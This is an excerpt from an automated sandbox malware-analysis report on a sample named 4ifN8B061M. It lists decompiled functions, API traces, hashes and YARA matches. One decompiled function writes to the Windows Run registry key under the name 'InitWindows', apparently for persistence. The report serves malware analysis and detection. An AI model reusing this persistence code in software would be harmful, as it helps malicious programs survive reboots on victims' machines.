                                        • Part of subcall function 002531EC: lstrlenA.KERNEL32(?,?,?,002555DF,.bss,00000000,?,?,00000000), ref: 002531F5
                                        • Part of subcall function 002531EC: lstrlenA.KERNEL32(?,?,?,002555DF,.bss,00000000,?,?,00000000), ref: 00253202
                                        • Part of subcall function 002531EC: lstrcpyA.KERNEL32(00000000,?,?,?,002555DF,.bss,00000000,?,?,00000000), ref: 00253215
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                        • Part of subcall function 00253264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00253289
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$FreeMessageSleepVirtual
                                      • String ID: .bss
                                      • API String ID: 413233750-3890483948
                                      • Opcode ID: 74b10c7c6fa8628c34cb82fa2b1767e09e635eee1de2d9b678a9881f25139330
                                      • Instruction ID: c1a8645f5d87845f5c8d18d4f130b56f6edc458f87b4d36fa14e8d1b15d42921
                                      • Opcode Fuzzy Hash: 74b10c7c6fa8628c34cb82fa2b1767e09e635eee1de2d9b678a9881f25139330
                                      • Instruction Fuzzy Hash: 4C516F71910559EBCB04EFA4D9D18EEB7B5BF44305B1041A9E806AB242EF30BF19CF94
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 012E8DD2, Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 012E8EED: _free.LIBCMT ref: 012E8F4D
                                        • Part of subcall function 012E8B66: GetOEMCP.KERNEL32(00000000,012E8DED,?,012E4B35,013B2144,013B2144,012E4B35), ref: 012E8B91
                                      • _free.LIBCMT ref: 012E8E4A
                                      • _free.LIBCMT ref: 012E8E80
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 2f1d0094ef63a3f4cde31448ded9be2ef2bc0e311eb8f6d14c522479af886a71
                                      • Instruction ID: 81b47c1efcfc4620e1fdafd0500c0938721ca49ef097f19d39f9ce16d66a8f52
                                      • Opcode Fuzzy Hash: 2f1d0094ef63a3f4cde31448ded9be2ef2bc0e311eb8f6d14c522479af886a71
                                      • Instruction Fuzzy Hash: F831C57191020AAFDB11EF68D848BEE7BF4FF44314F59015AFA54972A1EB319D50CB50
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 012E63C0, Relevance: 3.1, APIs: 2, Instructions: 56COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0fc555844dbe1c5ae579f2de276263b0731491c4660f22cab649b83308bce942
                                      • Instruction ID: b017cc55f01cc7ce7e2afe6232781c68a96d7443508e1a42cdf059db0ac78454
                                      • Opcode Fuzzy Hash: 0fc555844dbe1c5ae579f2de276263b0731491c4660f22cab649b83308bce942
                                      • Instruction Fuzzy Hash: E401B5376202169FEB36CE6DEC5895A37DBEBA4770F948121FA24CB148DA30D8518790
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 0025EFFE, Relevance: 3.0, APIs: 2, Instructions: 47registryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025EFFE(void** __ecx, void* _a4, short** _a8, int _a12, int _a16) {
				long _t10;
				short** _t22;
				void** _t23;

				_t23 = __ecx;
				_t22 = _a8;
				if(_a16 == 0 || E0025D721(_a4, _t22) != 0) {
					L4:
					_t10 = RegOpenKeyExW(_a4,  *_t22, 0, _a12, _t23); // executed
					if(_t10 != 0) {
						goto L6;
					}
					return _t10 + 1;
				} else {
					_a16 = 0;
					if(RegCreateKeyExW(_a4,  *_t22, 0, 0, 0, _a12, 0, __ecx,  &_a16) != 0) {
						L6:
						return 0;
					}
					E0025EF4C(_t23);
					goto L4;
				}
			}






                                      0x0025f005
                                      0x0025f008
                                      0x0025f00e
                                      0x0025f043
                                      0x0025f04d
                                      0x0025f055
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0025f01e
                                      0x0025f021
                                      0x0025f03a
                                      0x0025f05a
                                      0x00000000
                                      0x0025f05a
                                      0x0025f03e
                                      0x00000000
                                      0x0025f03e

                                      APIs
                                      • RegOpenKeyExW.KERNEL32(?,?,00000000,?,?,?,?,?,?,0025F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 0025F04D
                                        • Part of subcall function 0025D721: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000,?,?,0025F01A,?,?,?,?,0025F392,80000001,?,000F003F), ref: 0025D737
                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,0025F392,80000001,?), ref: 0025F032
                                        • Part of subcall function 0025EF4C: RegCloseKey.KERNEL32(?,?,0025F043,?,0025F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,?), ref: 0025EF56
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Open$CloseCreate
                                      • String ID:
                                      • API String ID: 1752019758-0
                                      • Opcode ID: 3ee4622dd29302e42dc1d80b7c15cda44bcbb407e69ed8e2da0a529fdf05b5c3
                                      • Instruction ID: 984433bf7a0e5d48726bdb0ae6519d25fc7d313544649b2731f406a49a436a8a
                                      • Opcode Fuzzy Hash: 3ee4622dd29302e42dc1d80b7c15cda44bcbb407e69ed8e2da0a529fdf05b5c3
                                      • Instruction Fuzzy Hash: 1501697121021EBFAF109EA1DD88DBB7BADFF4439AB144039FC0581151E7B1CD35AAA4
                                      Uniqueness

                                      Uniqueness Score: 0.24%

                                      Function 012E4DFC, Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 012E9317: GetEnvironmentStringsW.KERNEL32 ref: 012E9320
                                        • Part of subcall function 012E9317: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 012E9343
                                        • Part of subcall function 012E9317: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 012E9369
                                        • Part of subcall function 012E9317: _free.LIBCMT ref: 012E937C
                                        • Part of subcall function 012E9317: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 012E938B
                                      • _free.LIBCMT ref: 012E4E3C
                                      • _free.LIBCMT ref: 012E4E43
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                      • String ID:
                                      • API String ID: 400815659-0
                                      • Opcode ID: a2e0f05add59c4b80c07537762b9375794922ca3c42313b7dc17b05e6faebfa6
                                      • Instruction ID: dbe6587f35be237acccc08c658b9231d03cae66fb02eef09e13b09c4760e2d06
                                      • Opcode Fuzzy Hash: a2e0f05add59c4b80c07537762b9375794922ca3c42313b7dc17b05e6faebfa6
                                      • Instruction Fuzzy Hash: 13E02B23A2D46341E363363D3C5D57E13C45B91339FEA0316DA14C71C1EEB0884205E5
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 012E22B0, Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 012E249C: try_get_function.LIBVCRUNTIME ref: 012E24B1
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 012E22CE
                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 012E22D9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                      • String ID:
                                      • API String ID: 806969131-0
                                      • Opcode ID: 9479a5ed3db0e67a63ccf87a8723d0806ae74d4876db5a08648156551ca1e5ae
                                      • Instruction ID: 4d847db0c38dd4c3185d83196964b644b3dff7e7dfac2100fbe3108be1d32ac7
                                      • Opcode Fuzzy Hash: 9479a5ed3db0e67a63ccf87a8723d0806ae74d4876db5a08648156551ca1e5ae
                                      • Instruction Fuzzy Hash: 8CD02228838313C88F1A26B93D2E4F823CCA9226B53F05B4BC123EA4C1FF508000313A
                                      Uniqueness

                                      Uniqueness Score: 0.34%

                                      Function 0025FB09, Relevance: 3.0, APIs: 2, Instructions: 14sleepCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025FB09(signed int _a4) {

				Sleep(1); // executed
				return GetTickCount() * (1 + _a4 * 0x359) % 0x2710;
			}



                                      0x0025fb0e
                                      0x0025fb31

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountSleepTick
                                      • String ID:
                                      • API String ID: 2804873075-0
                                      • Opcode ID: acb7a90d3ef2e1a131849970500f517b5b2d52757649e3029d83940a14e75b4e
                                      • Instruction ID: ddb7d964e0af27d95870ddca47c803c6e7176c81a9b6f5d8f871fb0fc9213b45
                                      • Opcode Fuzzy Hash: acb7a90d3ef2e1a131849970500f517b5b2d52757649e3029d83940a14e75b4e
                                      • Instruction Fuzzy Hash: 6FD0A9303481048BE30C9A09FC4E2613A4EC7C2301F00C06BF20EC90A2C9E155944490
                                      Uniqueness

                                      Uniqueness Score: 1.69%

                                      Function 0025E221, Relevance: 3.0, APIs: 2, Instructions: 8synchronizationUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025E221(void** __ecx) {
				int _t2;
				void** _t4;

				_t4 = __ecx;
				ReleaseMutex( *__ecx);
				_t2 = CloseHandle( *_t4); // executed
				return _t2;
			}





                                      0x0025e222
                                      0x0025e226
                                      0x0025e22e
                                      0x0025e235

                                      APIs
                                      • ReleaseMutex.KERNEL32(?,?,0025DE9B,?,00255774,?,00000000,00000000,00000000,00000000,?,0000000A,?,?,00000000,.bss), ref: 0025E226
                                      • CloseHandle.KERNEL32(?), ref: 0025E22E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleMutexRelease
                                      • String ID:
                                      • API String ID: 4207627910-0
                                      • Opcode ID: 891bcadff337102fe9d5ff7364a12914b2a5b25554b3a250363f0a12f969fd45
                                      • Instruction ID: dfb55b8c847d532c88b76b552d4f69e636dd9d575649d55593ca67586854e6ef
                                      • Opcode Fuzzy Hash: 891bcadff337102fe9d5ff7364a12914b2a5b25554b3a250363f0a12f969fd45
                                      • Instruction Fuzzy Hash: 03B0923A004420DFEB212F94FC0C8957BA9FF0935131944AAF581911388BE20C159B80
                                      Uniqueness

                                      Uniqueness Score: 23.02%

                                      Function 00255A87, Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00255A87(long __ecx) {
				void* _t2;

				_t2 = RtlAllocateHeap(GetProcessHeap(), 0, __ecx); // executed
				return _t2;
			}




                                      0x00255a91
                                      0x00255a97

                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,?,00252DD7,?,?,?,0025E39B,?,002558E9,?,?,00000000,?,002555D2,00000000), ref: 00255A8A
                                      • RtlAllocateHeap.NTDLL(00000000,?,0025E39B,?,002558E9,?,?,00000000,?,002555D2,00000000,?,?,00000000), ref: 00255A91
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcess
                                      • String ID:
                                      • API String ID: 1357844191-0
                                      • Opcode ID: 19b72a1b6c24bbd861ee024fd7ce42e922844c3f79f45766a117eb9681d1833c
                                      • Instruction ID: 0fed0d0557ee86599e41c885d70bc70679795aa868de7f57f4f30e3b6a01d2bf
                                      • Opcode Fuzzy Hash: 19b72a1b6c24bbd861ee024fd7ce42e922844c3f79f45766a117eb9681d1833c
                                      • Instruction Fuzzy Hash: C9A002B5558500DFDD4457A4BD0DB153528A746703F109584F3098509195E554049631
                                      Uniqueness

                                      Uniqueness Score: 0.01%

                                      Function 00255A76, Relevance: 2.5, APIs: 2, Instructions: 6memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00255A76(void* __ecx) {
				int _t2;

				_t2 = HeapFree(GetProcessHeap(), 0, __ecx); // executed
				return _t2;
			}




                                      0x00255a80
                                      0x00255a86

                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,?,00255A61,00252DD7,?,?,?,0025E39B,?,002558E9,?,?,00000000,?,002555D2,00000000), ref: 00255A79
                                      • HeapFree.KERNEL32(00000000,?,0025E39B), ref: 00255A80
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 70424dc4e0bb1262f46fa7f6552ffb1a7697d3e9ba2b07af57a3dd738db77764
                                      • Instruction ID: 2ab9734bb39b677a20877fe824a2534587673827de85fd01e400790a5b6fb653
                                      • Opcode Fuzzy Hash: 70424dc4e0bb1262f46fa7f6552ffb1a7697d3e9ba2b07af57a3dd738db77764
                                      • Instruction Fuzzy Hash: 06A002B1558510DFDD4457A5BD0EB1535289746707F008584F30D8509195F454048631
                                      Uniqueness

                                      Uniqueness Score: 0.01%

                                      Function 012E946D, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 012E622D: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,012E7957,00000001,00000364,00000004,000000FF,?,?,?,012E621F,012E47EE), ref: 012E626E
                                      • _free.LIBCMT ref: 012E94D9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: AllocateHeap_free
                                      • String ID:
                                      • API String ID: 614378929-0
                                      • Opcode ID: 17a7c154d6bf4ed951418ce08b6c764d8d70667bd326596135f291e8ce38b01d
                                      • Instruction ID: f219e77f1b5bb3de68eed4c5c671d28fde18a444570f73dbd39b24ab971c70c0
                                      • Opcode Fuzzy Hash: 17a7c154d6bf4ed951418ce08b6c764d8d70667bd326596135f291e8ce38b01d
                                      • Instruction Fuzzy Hash: DA014E722103065BE7318F59D8459AAFBDCFBD5234F65051DE284432C0EA706845C774
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 00260A57, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 87%
                                      			E00260A57(void* __ecx) {
				void* _t22;
				intOrPtr* _t32;
				intOrPtr* _t33;
				intOrPtr* _t34;
				intOrPtr* _t37;
				void* _t42;

				_t42 = __ecx;
				_t1 = _t42 + 0x34; // 0x0
				_t32 =  *_t1;
				if(_t32 != 0) {
					 *((intOrPtr*)( *_t32 + 0x24))(_t32);
				}
				_t3 = _t42 + 0x34; // 0x0
				_t33 =  *_t3;
				if(_t33 != 0) {
					 *((intOrPtr*)( *_t33 + 8))(_t33);
					 *((intOrPtr*)(_t42 + 0x34)) = 0;
				}
				_t6 = _t42 + 0x18; // 0x0
				_t34 =  *_t6;
				if(_t34 != 0) {
					 *((intOrPtr*)( *_t34 + 8))(_t34);
					 *((intOrPtr*)(_t42 + 0x18)) = 0;
				}
				_t9 = _t42 + 0x1c; // 0x3c0a74
				E002523FE(_t9);
				_t10 = _t42 + 0x20; // 0x3c0a78
				E002523FE(_t10);
				_t11 = _t42 + 0x24; // 0x0
				_t37 =  *_t11;
				if(_t37 != 0) {
					 *((intOrPtr*)( *_t37 + 8))(_t37);
					 *((intOrPtr*)(_t42 + 0x24)) = 0;
				}
				_t14 = _t42 + 0x28; // 0x3c0a80
				E002523FE(_t14);
				_t15 = _t42 + 0x2c; // 0x3c0a84
				E002523FE(_t15);
				_t16 = _t42 + 0x30; // 0x3c0a88
				_t22 = E002523FE(_t16);
				 *((intOrPtr*)(_t42 + 0x34)) = 0;
				__imp__CoUninitialize(); // executed
				return _t22;
			}









                                      0x00260a58
                                      0x00260a5b
                                      0x00260a5b
                                      0x00260a60
                                      0x00260a65
                                      0x00260a65
                                      0x00260a68
                                      0x00260a68
                                      0x00260a6f
                                      0x00260a74
                                      0x00260a77
                                      0x00260a77
                                      0x00260a7a
                                      0x00260a7a
                                      0x00260a7f
                                      0x00260a84
                                      0x00260a87
                                      0x00260a87
                                      0x00260a8a
                                      0x00260a8d
                                      0x00260a92
                                      0x00260a95
                                      0x00260a9a
                                      0x00260a9a
                                      0x00260a9f
                                      0x00260aa4
                                      0x00260aa7
                                      0x00260aa7
                                      0x00260aaa
                                      0x00260aad
                                      0x00260ab2
                                      0x00260ab5
                                      0x00260aba
                                      0x00260abd
                                      0x00260ac2
                                      0x00260ac5
                                      0x00260acd

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Uninitialize
                                      • String ID:
                                      • API String ID: 3861434553-0
                                      • Opcode ID: 8b249313bfc37054162e5c1a9121bdfeb17c0fac0c7fd1c4f0b8b65b97a13331
                                      • Instruction ID: d05f58f32a8989d9b8cad225667bca61943b5a62c6e9289af94f2c968b7470d1
                                      • Opcode Fuzzy Hash: 8b249313bfc37054162e5c1a9121bdfeb17c0fac0c7fd1c4f0b8b65b97a13331
                                      • Instruction Fuzzy Hash: 1501E5752227009FC338DF25D5A486BB7E4EF597013405A6DE48787AA1CB39F859DF00
                                      Uniqueness

                                      Uniqueness Score: 8.94%

                                      Function 012E622D, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,012E7957,00000001,00000364,00000004,000000FF,?,?,?,012E621F,012E47EE), ref: 012E626E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
